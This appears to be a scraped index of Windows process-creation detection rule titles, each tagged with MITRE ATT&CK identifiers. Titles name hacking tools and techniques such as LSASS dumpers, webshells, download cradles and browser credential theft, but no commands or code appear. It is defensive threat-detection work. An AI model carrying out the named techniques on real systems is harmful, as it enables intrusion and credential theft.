open-menu
closeme
Unusual Parent Process For Cmd.EXE
calendar
Dec 6, 2023
·
attack.execution
attack.t1059
·
Share on:
twitter
facebook
linkedin
copy
HackTool - WinPwn Execution
calendar
Dec 4, 2023
·
attack.credential_access
attack.defense_evasion
attack.discovery
attack.execution
attack.privilege_escalation
attack.t1046
attack.t1082
attack.t1106
attack.t1518
attack.t1548.002
attack.t1552.001
attack.t1555
attack.t1555.003
·
Share on:
twitter
facebook
linkedin
copy
HackTool - Impacket Tools Execution
calendar
Dec 4, 2023
·
attack.execution
attack.t1557.001
·
Share on:
twitter
facebook
linkedin
copy
HackTool - winPEAS Execution
calendar
Dec 4, 2023
·
attack.privilege_escalation
attack.t1082
attack.t1087
attack.t1046
·
Share on:
twitter
facebook
linkedin
copy
Potential Homoglyph Attack Using Lookalike Characters
calendar
Dec 4, 2023
·
attack.defense_evasion
attack.t1036
attack.t1036.003
·
Share on:
twitter
facebook
linkedin
copy
Writing Of Malicious Files To The Fonts Folder
calendar
Dec 4, 2023
·
attack.t1211
attack.t1059
attack.defense_evasion
attack.persistence
·
Share on:
twitter
facebook
linkedin
copy
DirLister Execution
calendar
Dec 1, 2023
·
attack.discovery
attack.t1083
·
Share on:
twitter
facebook
linkedin
copy
Disable Windows IIS HTTP Logging
calendar
Dec 1, 2023
·
attack.defense_evasion
attack.t1562.002
·
Share on:
twitter
facebook
linkedin
copy
Disabled RestrictedAdminMode For RDS - ProcCreation
calendar
Dec 1, 2023
·
attack.defense_evasion
attack.t1112
·
Share on:
twitter
facebook
linkedin
copy
Execution from Suspicious Folder
calendar
Dec 1, 2023
·
attack.defense_evasion
attack.t1036
·
Share on:
twitter
facebook
linkedin
copy
Fsutil Behavior Set SymlinkEvaluation
calendar
Dec 1, 2023
·
attack.execution
attack.t1059
·
Share on:
twitter
facebook
linkedin
copy
HackTool - HandleKatz LSASS Dumper Execution
calendar
Dec 1, 2023
·
attack.credential_access
attack.t1003.001
·
Share on:
twitter
facebook
linkedin
copy
HackTool - Htran/NATBypass Execution
calendar
Dec 1, 2023
·
attack.command_and_control
attack.t1090
attack.s0040
·
Share on:
twitter
facebook
linkedin
copy
HackTool - Inveigh Execution
calendar
Dec 1, 2023
·
attack.credential_access
attack.t1003.001
·
Share on:
twitter
facebook
linkedin
copy
HackTool - KrbRelay Execution
calendar
Dec 1, 2023
·
attack.credential_access
attack.t1558.003
·
Share on:
twitter
facebook
linkedin
copy
HackTool - KrbRelayUp Execution
calendar
Dec 1, 2023
·
attack.credential_access
attack.t1558.003
attack.lateral_movement
attack.t1550.003
·
Share on:
twitter
facebook
linkedin
copy
HackTool - PowerTool Execution
calendar
Dec 1, 2023
·
attack.defense_evasion
attack.t1562.001
·
Share on:
twitter
facebook
linkedin
copy
HackTool - SafetyKatz Execution
calendar
Dec 1, 2023
·
attack.credential_access
attack.t1003.001
·
Share on:
twitter
facebook
linkedin
copy
HackTool - SharPersist Execution
calendar
Dec 1, 2023
·
attack.persistence
attack.t1053
·
Share on:
twitter
facebook
linkedin
copy
HackTool - SharpLdapWhoami Execution
calendar
Dec 1, 2023
·
attack.discovery
attack.t1033
car.2016-03-001
·
Share on:
twitter
facebook
linkedin
copy
HackTool - SysmonEOP Execution
calendar
Dec 1, 2023
·
cve.2022.41120
attack.t1068
attack.privilege_escalation
·
Share on:
twitter
facebook
linkedin
copy
Import PowerShell Modules From Suspicious Directories - ProcCreation
calendar
Dec 1, 2023
·
attack.execution
attack.t1059.001
·
Share on:
twitter
facebook
linkedin
copy
Lolbin Ssh.exe Use As Proxy
calendar
Dec 1, 2023
·
attack.defense_evasion
attack.t1202
·
Share on:
twitter
facebook
linkedin
copy
Microsoft IIS Service Account Password Dumped
calendar
Dec 1, 2023
·
attack.credential_access
attack.t1003
·
Share on:
twitter
facebook
linkedin
copy
New Generic Credentials Added Via Cmdkey.EXE
calendar
Dec 1, 2023
·
attack.credential_access
attack.t1003.005
·
Share on:
twitter
facebook
linkedin
copy
New Remote Desktop Connection Initiated Via Mstsc.EXE
calendar
Dec 1, 2023
·
attack.lateral_movement
attack.t1021.001
·
Share on:
twitter
facebook
linkedin
copy
Nltest.EXE Execution
calendar
Dec 1, 2023
·
attack.discovery
attack.t1016
attack.t1018
attack.t1482
·
Share on:
twitter
facebook
linkedin
copy
Operator Bloopers Cobalt Strike Commands
calendar
Dec 1, 2023
·
attack.execution
attack.t1059.003
stp.1u
·
Share on:
twitter
facebook
linkedin
copy
Operator Bloopers Cobalt Strike Modules
calendar
Dec 1, 2023
·
attack.execution
attack.t1059.003
·
Share on:
twitter
facebook
linkedin
copy
PDQ Deploy Remote Adminstartion Tool Execution
calendar
Dec 1, 2023
·
attack.execution
attack.lateral_movement
attack.t1072
·
Share on:
twitter
facebook
linkedin
copy
Potential Active Directory Enumeration Using AD Module - ProcCreation
calendar
Dec 1, 2023
·
attack.reconnaissance
attack.discovery
attack.impact
·
Share on:
twitter
facebook
linkedin
copy
Potential Arbitrary Code Execution Via Node.EXE
calendar
Dec 1, 2023
·
attack.defense_evasion
attack.t1127
·
Share on:
twitter
facebook
linkedin
copy
Potential Credential Dumping Attempt Using New NetworkProvider - CLI
calendar
Dec 1, 2023
·
attack.credential_access
attack.t1003
·
Share on:
twitter
facebook
linkedin
copy
Potential Discovery Activity Via Dnscmd.EXE
calendar
Dec 1, 2023
·
attack.discovery
attack.execution
attack.t1543.003
·
Share on:
twitter
facebook
linkedin
copy
Potential DLL Sideloading Via DeviceEnroller.EXE
calendar
Dec 1, 2023
·
attack.defense_evasion
attack.t1574.002
·
Share on:
twitter
facebook
linkedin
copy
Potential Password Spraying Attempt Using Dsacls.EXE
calendar
Dec 1, 2023
·
attack.execution
attack.t1218
·
Share on:
twitter
facebook
linkedin
copy
Potential Persistence Via Powershell Search Order Hijacking - Task
calendar
Dec 1, 2023
·
attack.execution
attack.persistence
attack.t1053.005
attack.t1059.001
·
Share on:
twitter
facebook
linkedin
copy
Potential PowerShell Execution Policy Tampering - ProcCreation
calendar
Dec 1, 2023
·
attack.defense_evasion
·
Share on:
twitter
facebook
linkedin
copy
Potential Process Injection Via Msra.EXE
calendar
Dec 1, 2023
·
attack.defense_evasion
attack.t1055
·
Share on:
twitter
facebook
linkedin
copy
Potential RDP Tunneling Via SSH
calendar
Dec 1, 2023
·
attack.command_and_control
attack.t1572
·
Share on:
twitter
facebook
linkedin
copy
Potential Recon Activity Via Nltest.EXE
calendar
Dec 1, 2023
·
attack.discovery
attack.t1016
attack.t1482
·
Share on:
twitter
facebook
linkedin
copy
Potential Reconnaissance For Cached Credentials Via Cmdkey.EXE
calendar
Dec 1, 2023
·
attack.credential_access
attack.t1003.005
·
Share on:
twitter
facebook
linkedin
copy
Potential Renamed Rundll32 Execution
calendar
Dec 1, 2023
·
attack.execution
·
Share on:
twitter
facebook
linkedin
copy
Potential Signing Bypass Via Windows Developer Features
calendar
Dec 1, 2023
·
attack.defense_evasion
·
Share on:
twitter
facebook
linkedin
copy
Potential WinAPI Calls Via CommandLine
calendar
Dec 1, 2023
·
attack.execution
attack.t1106
·
Share on:
twitter
facebook
linkedin
copy
Potentially Over Permissive Permissions Granted Using Dsacls.EXE
calendar
Dec 1, 2023
·
attack.execution
attack.t1218
·
Share on:
twitter
facebook
linkedin
copy
Powershell Base64 Encoded MpPreference Cmdlet
calendar
Dec 1, 2023
·
attack.defense_evasion
attack.t1562.001
·
Share on:
twitter
facebook
linkedin
copy
PowerShell Base64 Encoded WMI Classes
calendar
Dec 1, 2023
·
attack.execution
attack.t1059.001
attack.defense_evasion
attack.t1027
·
Share on:
twitter
facebook
linkedin
copy
PUA - DefenderCheck Execution
calendar
Dec 1, 2023
·
attack.defense_evasion
attack.t1027.005
·
Share on:
twitter
facebook
linkedin
copy
PUA - Fast Reverse Proxy (FRP) Execution
calendar
Dec 1, 2023
·
attack.command_and_control
attack.t1090
·
Share on:
twitter
facebook
linkedin
copy
PUA - NPS Tunneling Tool Execution
calendar
Dec 1, 2023
·
attack.command_and_control
attack.t1090
·
Share on:
twitter
facebook
linkedin
copy
PUA - Seatbelt Execution
calendar
Dec 1, 2023
·
attack.discovery
attack.t1526
attack.t1087
attack.t1083
·
Share on:
twitter
facebook
linkedin
copy
Query Usage To Exfil Data
calendar
Dec 1, 2023
·
attack.execution
·
Share on:
twitter
facebook
linkedin
copy
Renamed BrowserCore.EXE Execution
calendar
Dec 1, 2023
·
attack.t1528
attack.t1036.003
·
Share on:
twitter
facebook
linkedin
copy
Renamed Mavinject.EXE Execution
calendar
Dec 1, 2023
·
attack.defense_evasion
attack.privilege_escalation
attack.t1055.001
attack.t1218.013
·
Share on:
twitter
facebook
linkedin
copy
Renamed Msdt.EXE Execution
calendar
Dec 1, 2023
·
attack.defense_evasion
attack.t1036.003
·
Share on:
twitter
facebook
linkedin
copy
Renamed NetSupport RAT Execution
calendar
Dec 1, 2023
·
attack.defense_evasion
·
Share on:
twitter
facebook
linkedin
copy
Renamed Plink Execution
calendar
Dec 1, 2023
·
attack.defense_evasion
attack.t1036
·
Share on:
twitter
facebook
linkedin
copy
Renamed Remote Utilities RAT (RURAT) Execution
calendar
Dec 1, 2023
·
attack.defense_evasion
attack.collection
attack.command_and_control
attack.discovery
attack.s0592
·
Share on:
twitter
facebook
linkedin
copy
Renamed Sysinternals Sdelete Execution
calendar
Dec 1, 2023
·
attack.impact
attack.t1485
·
Share on:
twitter
facebook
linkedin
copy
Renamed Vmnat.exe Execution
calendar
Dec 1, 2023
·
attack.defense_evasion
attack.t1574.002
·
Share on:
twitter
facebook
linkedin
copy
Root Certificate Installed From Susp Locations
calendar
Dec 1, 2023
·
attack.defense_evasion
attack.t1553.004
·
Share on:
twitter
facebook
linkedin
copy
SafeBoot Registry Key Deleted Via Reg.EXE
calendar
Dec 1, 2023
·
attack.defense_evasion
attack.t1562.001
·
Share on:
twitter
facebook
linkedin
copy
Service Registry Key Deleted Via Reg.EXE
calendar
Dec 1, 2023
·
attack.defense_evasion
attack.t1562.001
·
Share on:
twitter
facebook
linkedin
copy
SQLite Chromium Profile Data DB Access
calendar
Dec 1, 2023
·
attack.credential_access
attack.t1539
attack.t1555.003
attack.collection
attack.t1005
·
Share on:
twitter
facebook
linkedin
copy
SQLite Firefox Profile Data DB Access
calendar
Dec 1, 2023
·
attack.credential_access
attack.t1539
attack.collection
attack.t1005
·
Share on:
twitter
facebook
linkedin
copy
Suspicious Binary In User Directory Spawned From Office Application
calendar
Dec 1, 2023
·
attack.execution
attack.t1204.002
attack.g0046
car.2013-05-002
·
Share on:
twitter
facebook
linkedin
copy
Suspicious Git Clone
calendar
Dec 1, 2023
·
attack.reconnaissance
attack.t1593.003
·
Share on:
twitter
facebook
linkedin
copy
Suspicious Hacktool Execution - Imphash
calendar
Dec 1, 2023
·
attack.credential_access
attack.t1588.002
attack.t1003
·
Share on:
twitter
facebook
linkedin
copy
Suspicious Hacktool Execution - PE Metadata
calendar
Dec 1, 2023
·
attack.credential_access
attack.t1588.002
attack.t1003
·
Share on:
twitter
facebook
linkedin
copy
Suspicious IIS URL GlobalRules Rewrite Via AppCmd
calendar
Dec 1, 2023
·
attack.defense_evasion
·
Share on:
twitter
facebook
linkedin
copy
Suspicious New Instance Of An Office COM Object
calendar
Dec 1, 2023
·
attack.execution
attack.defense_evasion
·
Share on:
twitter
facebook
linkedin
copy
Suspicious Rundll32 Script in CommandLine
calendar
Dec 1, 2023
·
attack.defense_evasion
attack.t1218.011
·
Share on:
twitter
facebook
linkedin
copy
Suspicious Shells Spawn by Java Utility Keytool
calendar
Dec 1, 2023
·
attack.initial_access
attack.persistence
attack.privilege_escalation
·
Share on:
twitter
facebook
linkedin
copy
Suspicious Use of PsLogList
calendar
Dec 1, 2023
·
attack.discovery
attack.t1087
attack.t1087.001
attack.t1087.002
·
Share on:
twitter
facebook
linkedin
copy
Suspicious Windows Defender Folder Exclusion Added Via Reg.EXE
calendar
Dec 1, 2023
·
attack.defense_evasion
attack.t1562.001
·
Share on:
twitter
facebook
linkedin
copy
Uncommon One Time Only Scheduled Task At 00:00
calendar
Dec 1, 2023
·
attack.execution
attack.persistence
attack.privilege_escalation
attack.t1053.005
·
Share on:
twitter
facebook
linkedin
copy
Unsigned AppX Installation Attempt Using Add-AppxPackage
calendar
Dec 1, 2023
·
attack.persistence
attack.defense_evasion
·
Share on:
twitter
facebook
linkedin
copy
Potential Persistence Via Netsh Helper DLL
calendar
Nov 28, 2023
·
attack.privilege_escalation
attack.persistence
attack.t1546.007
attack.s0108
·
Share on:
twitter
facebook
linkedin
copy
Wusa.EXE Executed By Parent Process Located In Suspicious Location
calendar
Nov 28, 2023
·
attack.execution
·
Share on:
twitter
facebook
linkedin
copy
Wusa.EXE Extracting Cab Files From Suspicious Paths
calendar
Nov 28, 2023
·
attack.execution
·
Share on:
twitter
facebook
linkedin
copy
Chromium Browser Instance Executed With Custom Extension
calendar
Nov 28, 2023
·
attack.persistence
attack.t1176
·
Share on:
twitter
facebook
linkedin
copy
Suspicious Chromium Browser Instance Executed With Custom Extension
calendar
Nov 28, 2023
·
attack.persistence
attack.t1176
·
Share on:
twitter
facebook
linkedin
copy
PUA - AdFind Suspicious Execution
calendar
Nov 27, 2023
·
attack.discovery
attack.t1018
attack.t1087.002
attack.t1482
attack.t1069.002
stp.1u
·
Share on:
twitter
facebook
linkedin
copy
Scheduled Task Creation
calendar
Nov 27, 2023
·
attack.execution
attack.persistence
attack.privilege_escalation
attack.t1053.005
attack.s0111
car.2013-08-001
stp.1u
·
Share on:
twitter
facebook
linkedin
copy
Rundll32 Execution Without DLL File
calendar
Nov 20, 2023
·
attack.defense_evasion
attack.t1218.011
·
Share on:
twitter
facebook
linkedin
copy
Potentially Suspicious EventLog Recon Activity Using Log Query Utilities
calendar
Nov 20, 2023
·
attack.credential_access
attack.discovery
attack.t1552
·
Share on:
twitter
facebook
linkedin
copy
Bad Opsec Defaults Sacrificial Processes With Improper Arguments
calendar
Nov 15, 2023
·
attack.defense_evasion
attack.t1218.011
·
Share on:
twitter
facebook
linkedin
copy
Findstr GPP Passwords
calendar
Nov 15, 2023
·
attack.credential_access
attack.t1552.006
·
Share on:
twitter
facebook
linkedin
copy
Findstr Launching .lnk File
calendar
Nov 15, 2023
·
attack.defense_evasion
attack.t1036
attack.t1202
attack.t1027.003
·
Share on:
twitter
facebook
linkedin
copy
Insensitive Subfolder Search Via Findstr.EXE
calendar
Nov 15, 2023
·
attack.defense_evasion
attack.t1218
attack.t1564.004
attack.t1552.001
attack.t1105
·
Share on:
twitter
facebook
linkedin
copy
LSASS Process Reconnaissance Via Findstr.EXE
calendar
Nov 15, 2023
·
attack.credential_access
attack.t1552.006
·
Share on:
twitter
facebook
linkedin
copy
Permission Misconfiguration Reconnaissance Via Findstr.EXE
calendar
Nov 15, 2023
·
attack.credential_access
attack.t1552.006
·
Share on:
twitter
facebook
linkedin
copy
Proxy Execution Via Wuauclt.EXE
calendar
Nov 15, 2023
·
attack.defense_evasion
attack.t1218
attack.execution
·
Share on:
twitter
facebook
linkedin
copy
Recon Command Output Piped To Findstr.EXE
calendar
Nov 15, 2023
·
attack.discovery
attack.t1057
·
Share on:
twitter
facebook
linkedin
copy
Remote File Download Via Findstr.EXE
calendar
Nov 15, 2023
·
attack.defense_evasion
attack.t1218
attack.t1564.004
attack.t1552.001
attack.t1105
·
Share on:
twitter
facebook
linkedin
copy
Renamed Office Binary Execution
calendar
Nov 15, 2023
·
attack.defense_evasion
·
Share on:
twitter
facebook
linkedin
copy
Security Tools Keyword Lookup Via Findstr.EXE
calendar
Nov 15, 2023
·
attack.discovery
attack.t1518.001
·
Share on:
twitter
facebook
linkedin
copy
Suspicious Shim Database Installation via Sdbinst.EXE
calendar
Nov 15, 2023
·
attack.persistence
attack.privilege_escalation
attack.t1546.011
·
Share on:
twitter
facebook
linkedin
copy
Suspicious Windows Update Agent Empty Cmdline
calendar
Nov 15, 2023
·
attack.defense_evasion
attack.t1036
·
Share on:
twitter
facebook
linkedin
copy
Sysmon Discovery Via Default Driver Altitude Using Findstr.EXE
calendar
Nov 15, 2023
·
attack.discovery
attack.t1518.001
·
Share on:
twitter
facebook
linkedin
copy
Uncommon Userinit Child Process
calendar
Nov 15, 2023
·
attack.t1037.001
attack.persistence
·
Share on:
twitter
facebook
linkedin
copy
Arbitrary File Download Via IMEWDBLD.EXE
calendar
Nov 14, 2023
·
attack.defense_evasion
attack.execution
attack.t1218
·
Share on:
twitter
facebook
linkedin
copy
Arbitrary File Download Via MSEDGE_PROXY.EXE
calendar
Nov 14, 2023
·
attack.defense_evasion
attack.execution
attack.t1218
·
Share on:
twitter
facebook
linkedin
copy
Arbitrary File Download Via MSOHTMED.EXE
calendar
Nov 14, 2023
·
attack.defense_evasion
attack.execution
attack.t1218
·
Share on:
twitter
facebook
linkedin
copy
Arbitrary File Download Via MSPUB.EXE
calendar
Nov 14, 2023
·
attack.defense_evasion
attack.execution
attack.t1218
·
Share on:
twitter
facebook
linkedin
copy
Arbitrary File Download Via PresentationHost.EXE
calendar
Nov 14, 2023
·
attack.defense_evasion
attack.execution
attack.t1218
·
Share on:
twitter
facebook
linkedin
copy
Arbitrary File Download Via Squirrel.EXE
calendar
Nov 14, 2023
·
attack.defense_evasion
attack.execution
attack.t1218
·
Share on:
twitter
facebook
linkedin
copy
File Download And Execution Via IEExec.EXE
calendar
Nov 14, 2023
·
attack.command_and_control
attack.t1105
·
Share on:
twitter
facebook
linkedin
copy
File Download From Browser Process Via Inline URL
calendar
Nov 14, 2023
·
attack.command_and_control
attack.t1105
·
Share on:
twitter
facebook
linkedin
copy
File Download Using ProtocolHandler.exe
calendar
Nov 14, 2023
·
attack.defense_evasion
attack.t1218
·
Share on:
twitter
facebook
linkedin
copy
File Download Via InstallUtil.EXE
calendar
Nov 14, 2023
·
attack.defense_evasion
attack.t1218
·
Share on:
twitter
facebook
linkedin
copy
File Download Via Windows Defender MpCmpRun.EXE
calendar
Nov 14, 2023
·
attack.defense_evasion
attack.t1218
attack.command_and_control
attack.t1105
·
Share on:
twitter
facebook
linkedin
copy
Msxsl.EXE Execution
calendar
Nov 14, 2023
·
attack.defense_evasion
attack.t1220
·
Share on:
twitter
facebook
linkedin
copy
Potential File Download Via MS-AppInstaller Protocol Handler
calendar
Nov 14, 2023
·
attack.defense_evasion
attack.execution
attack.t1218
·
Share on:
twitter
facebook
linkedin
copy
Potentially Suspicious Electron Application CommandLine
calendar
Nov 14, 2023
·
attack.execution
·
Share on:
twitter
facebook
linkedin
copy
Process Proxy Execution Via Squirrel.EXE
calendar
Nov 14, 2023
·
attack.defense_evasion
attack.execution
attack.t1218
·
Share on:
twitter
facebook
linkedin
copy
Remote XSL Execution Via Msxsl.EXE
calendar
Nov 14, 2023
·
attack.defense_evasion
attack.t1220
·
Share on:
twitter
facebook
linkedin
copy
Suspicious Calculator Usage
calendar
Nov 14, 2023
·
attack.defense_evasion
attack.t1036
·
Share on:
twitter
facebook
linkedin
copy
Uncommon Child Process Of Appvlp.EXE
calendar
Nov 14, 2023
·
attack.t1218
attack.defense_evasion
attack.execution
·
Share on:
twitter
facebook
linkedin
copy
XBAP Execution From Uncommon Locations Via PresentationHost.EXE
calendar
Nov 14, 2023
·
attack.defense_evasion
attack.execution
attack.t1218
·
Share on:
twitter
facebook
linkedin
copy
XSL Script Execution Via WMIC.EXE
calendar
Nov 14, 2023
·
attack.defense_evasion
attack.t1220
·
Share on:
twitter
facebook
linkedin
copy
Potential Excel.EXE DCOM Lateral Movement Via ActivateMicrosoftApp
calendar
Nov 14, 2023
·
attack.t1021.003
attack.lateral_movement
·
Share on:
twitter
facebook
linkedin
copy
Suspicious Process By Web Server Process
calendar
Nov 11, 2023
·
attack.persistence
attack.t1505.003
attack.t1190
·
Share on:
twitter
facebook
linkedin
copy
Portable Gpg.EXE Execution
calendar
Nov 10, 2023
·
attack.impact
attack.t1486
·
Share on:
twitter
facebook
linkedin
copy
Suspicious Whoami.EXE Execution
calendar
Nov 10, 2023
·
attack.discovery
attack.t1033
car.2016-03-001
·
Share on:
twitter
facebook
linkedin
copy
Suspicious WmiPrvSE Child Process
calendar
Nov 10, 2023
·
attack.execution
attack.defense_evasion
attack.t1047
attack.t1204.002
attack.t1218.010
·
Share on:
twitter
facebook
linkedin
copy
Chopper Webshell Process Pattern
calendar
Nov 10, 2023
·
attack.persistence
attack.t1505.003
attack.t1018
attack.t1033
attack.t1087
·
Share on:
twitter
facebook
linkedin
copy
Shell Process Spawned by Java.EXE
calendar
Nov 10, 2023
·
attack.initial_access
attack.persistence
attack.privilege_escalation
·
Share on:
twitter
facebook
linkedin
copy
Suspicious Processes Spawned by Java.EXE
calendar
Nov 10, 2023
·
attack.initial_access
attack.persistence
attack.privilege_escalation
·
Share on:
twitter
facebook
linkedin
copy
Webshell Detection With Command Line Keywords
calendar
Nov 10, 2023
·
attack.persistence
attack.t1505.003
attack.t1018
attack.t1033
attack.t1087
·
Share on:
twitter
facebook
linkedin
copy
Webshell Hacking Activity Patterns
calendar
Nov 10, 2023
·
attack.persistence
attack.t1505.003
attack.t1018
attack.t1033
attack.t1087
·
Share on:
twitter
facebook
linkedin
copy
Webshell Tool Reconnaissance Activity
calendar
Nov 10, 2023
·
attack.persistence
attack.t1505.003
·
Share on:
twitter
facebook
linkedin
copy
Execute Code with Pester.bat
calendar
Nov 9, 2023
·
attack.execution
attack.t1059.001
attack.defense_evasion
attack.t1216
·
Share on:
twitter
facebook
linkedin
copy
Csc.EXE Execution Form Potentially Suspicious Parent
calendar
Nov 6, 2023
·
attack.execution
attack.t1059.005
attack.t1059.007
attack.defense_evasion
attack.t1218.005
attack.t1027.004
·
Share on:
twitter
facebook
linkedin
copy
Dynamic .NET Compilation Via Csc.EXE
calendar
Nov 6, 2023
·
attack.defense_evasion
attack.t1027.004
·
Share on:
twitter
facebook
linkedin
copy
Obfuscated IP Download Activity
calendar
Nov 6, 2023
·
attack.discovery
·
Share on:
twitter
facebook
linkedin
copy
Obfuscated IP Via CLI
calendar
Nov 6, 2023
·
attack.discovery
·
Share on:
twitter
facebook
linkedin
copy
HackTool - CrackMapExec Execution Patterns
calendar
Nov 6, 2023
·
attack.execution
attack.t1047
attack.t1053
attack.t1059.003
attack.t1059.001
attack.s0106
·
Share on:
twitter
facebook
linkedin
copy
Port Forwarding Activity Via SSH.EXE
calendar
Nov 6, 2023
·
attack.command_and_control
attack.lateral_movement
attack.t1572
attack.t1021.001
attack.t1021.004
·
Share on:
twitter
facebook
linkedin
copy
Potentially Suspicious Cabinet File Expansion
calendar
Nov 6, 2023
·
attack.execution
attack.t1218
·
Share on:
twitter
facebook
linkedin
copy
Suspicious Process Execution From Fake Recycle.Bin Folder
calendar
Nov 6, 2023
·
attack.persistence
attack.defense_evasion
·
Share on:
twitter
facebook
linkedin
copy
Weak or Abused Passwords In CLI
calendar
Nov 6, 2023
·
attack.defense_evasion
attack.execution
·
Share on:
twitter
facebook
linkedin
copy
AADInternals PowerShell Cmdlets Execution - ProccessCreation
calendar
Nov 2, 2023
·
attack.execution
attack.reconnaissance
attack.discovery
attack.credential_access
attack.impact
·
Share on:
twitter
facebook
linkedin
copy
AgentExecutor PowerShell Execution
calendar
Nov 2, 2023
·
attack.defense_evasion
attack.t1218
·
Share on:
twitter
facebook
linkedin
copy
Browser Started with Remote Debugging
calendar
Nov 2, 2023
·
attack.credential_access
attack.t1185
·
Share on:
twitter
facebook
linkedin
copy
Deletion of Volume Shadow Copies via WMI with PowerShell
calendar
Nov 2, 2023
·
attack.impact
attack.t1490
·
Share on:
twitter
facebook
linkedin
copy
ImagingDevices Unusual Parent/Child Processes
calendar
Nov 2, 2023
·
attack.defense_evasion
attack.execution
·
Share on:
twitter
facebook
linkedin
copy
Lolbin Defaultpack.exe Use As Proxy
calendar
Nov 2, 2023
·
attack.t1218
attack.defense_evasion
attack.execution
·
Share on:
twitter
facebook
linkedin
copy
Lolbin Runexehelper Use As Proxy
calendar
Nov 2, 2023
·
attack.defense_evasion
attack.t1218
·
Share on:
twitter
facebook
linkedin
copy
Lolbin Unregmp2.exe Use As Proxy
calendar
Nov 2, 2023
·
attack.defense_evasion
attack.t1218
·
Share on:
twitter
facebook
linkedin
copy
Microsoft IIS Connection Strings Decryption
calendar
Nov 2, 2023
·
attack.credential_access
attack.t1003
·
Share on:
twitter
facebook
linkedin
copy
Net WebClient Casing Anomalies
calendar
Nov 2, 2023
·
attack.execution
attack.t1059.001
·
Share on:
twitter
facebook
linkedin
copy
Perl Inline Command Execution
calendar
Nov 2, 2023
·
attack.execution
attack.t1059
·
Share on:
twitter
facebook
linkedin
copy
Php Inline Command Execution
calendar
Nov 2, 2023
·
attack.execution
attack.t1059
·
Share on:
twitter
facebook
linkedin
copy
Potential COM Objects Download Cradles Usage - Process Creation
calendar
Nov 2, 2023
·
attack.command_and_control
attack.t1105
·
Share on:
twitter
facebook
linkedin
copy
Potential Data Stealing Via Chromium Headless Debugging
calendar
Nov 2, 2023
·
attack.credential_access
attack.t1185
·
Share on:
twitter
facebook
linkedin
copy
Potential RDP Session Hijacking Activity
calendar
Nov 2, 2023
·
attack.execution
·
Share on:
twitter
facebook
linkedin
copy
Potential Suspicious Activity Using SeCEdit
calendar
Nov 2, 2023
·
attack.discovery
attack.persistence
attack.defense_evasion
attack.credential_access
attack.privilege_escalation
attack.t1562.002
attack.t1547.001
attack.t1505.005
attack.t1556.002
attack.t1562
attack.t1574.007
attack.t1564.002
attack.t1546.008
attack.t1546.007
attack.t1547.014
attack.t1547.010
attack.t1547.002
attack.t1557
attack.t1082
·
Share on:
twitter
facebook
linkedin
copy
Potential Suspicious Windows Feature Enabled - ProcCreation
calendar
Nov 2, 2023
·
attack.defense_evasion
·
Share on:
twitter
facebook
linkedin
copy
Powershell Inline Execution From A File
calendar
Nov 2, 2023
·
attack.execution
attack.t1059.001
·
Share on:
twitter
facebook
linkedin
copy
Powershell Token Obfuscation - Process Creation
calendar
Nov 2, 2023
·
attack.defense_evasion
attack.t1027.009
·
Share on:
twitter
facebook
linkedin
copy
PowerShell Web Download
calendar
Nov 2, 2023
·
attack.command_and_control
attack.execution
attack.t1059.001
attack.t1105
·
Share on:
twitter
facebook
linkedin
copy
Privilege Escalation via Named Pipe Impersonation
calendar
Nov 2, 2023
·
attack.lateral_movement
attack.t1021
·
Share on:
twitter
facebook
linkedin
copy
Ruby Inline Command Execution
calendar
Nov 2, 2023
·
attack.execution
attack.t1059
·
Share on:
twitter
facebook
linkedin
copy
Suspicious AgentExecutor PowerShell Execution
calendar
Nov 2, 2023
·
attack.defense_evasion
attack.t1218
·
Share on:
twitter
facebook
linkedin
copy
Suspicious Execution of Powershell with Base64
calendar
Nov 2, 2023
·
attack.execution
attack.t1059.001
·
Share on:
twitter
facebook
linkedin
copy
Suspicious FromBase64String Usage On Gzip Archive - Process Creation
calendar
Nov 2, 2023
·
attack.command_and_control
attack.t1132.001
·
Share on:
twitter
facebook
linkedin
copy
Suspicious PowerShell Encoded Command Patterns
calendar
Nov 2, 2023
·
attack.execution
attack.t1059.001
·
Share on:
twitter
facebook
linkedin
copy
Suspicious PowerShell Invocations - Specific - ProcessCreation
calendar
Nov 2, 2023
·
attack.defense_evasion
·
Share on:
twitter
facebook
linkedin
copy
Suspicious Usage Of ShellExec_RunDLL
calendar
Nov 2, 2023
·
attack.defense_evasion
·
Share on:
twitter
facebook
linkedin
copy
Suspicious X509Enrollment - Process Creation
calendar
Nov 2, 2023
·
attack.defense_evasion
attack.t1553.004
·
Share on:
twitter
facebook
linkedin
copy
Use of Pcalua For Execution
calendar
Nov 2, 2023
·
attack.execution
attack.t1059
·
Share on:
twitter
facebook
linkedin
copy
Assembly Loading Via CL_LoadAssembly.ps1
calendar
Oct 28, 2023
·
attack.defense_evasion
attack.t1216
·
Share on:
twitter
facebook
linkedin
copy
Delete All Scheduled Tasks
calendar
Oct 28, 2023
·
attack.impact
attack.t1489
·
Share on:
twitter
facebook
linkedin
copy
Diskshadow Script Mode - Execution From Potential Suspicious Location
calendar
Oct 28, 2023
·
attack.execution
attack.t1218
·
Share on:
twitter
facebook
linkedin
copy
Kernel Memory Dump Via LiveKD
calendar
Oct 28, 2023
·
attack.defense_evasion
·
Share on:
twitter
facebook
linkedin
copy
Password Protected Compressed File Extraction Via 7Zip
calendar
Oct 28, 2023
·
attack.collection
attack.t1560.001
·
Share on:
twitter
facebook
linkedin
copy
Potential Amazon SSM Agent Hijacking
calendar
Oct 28, 2023
·
attack.command_and_control
attack.persistence
attack.t1219
·
Share on:
twitter
facebook
linkedin
copy
Potential Hidden Directory Creation Via NTFS INDEX_ALLOCATION Stream - CLI
calendar
Oct 28, 2023
·
attack.defense_evasion
attack.t1564.004
·
Share on:
twitter
facebook
linkedin
copy
Potential LethalHTA Technique Execution
calendar
Oct 28, 2023
·
attack.defense_evasion
attack.t1218.005
·
Share on:
twitter
facebook
linkedin
copy
Potential Process Execution Proxy Via CL_Invocation.ps1
calendar
Oct 28, 2023
·
attack.defense_evasion
attack.t1216
·
Share on:
twitter
facebook
linkedin
copy
Potential Suspicious Mofcomp Execution
calendar
Oct 28, 2023
·
attack.execution
attack.t1218
·
Share on:
twitter
facebook
linkedin
copy
WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
calendar
Oct 28, 2023
·
attack.execution
attack.t1059.005
attack.t1059.007
·
Share on:
twitter
facebook
linkedin
copy
Potentially Suspicious Child Process Of VsCode
calendar
Oct 28, 2023
·
attack.execution
attack.defense_evasion
attack.t1218
attack.t1202
·
Share on:
twitter
facebook
linkedin
copy
Renamed Visual Studio Code Tunnel Execution
calendar
Oct 28, 2023
·
attack.command_and_control
attack.t1071.001
·
Share on:
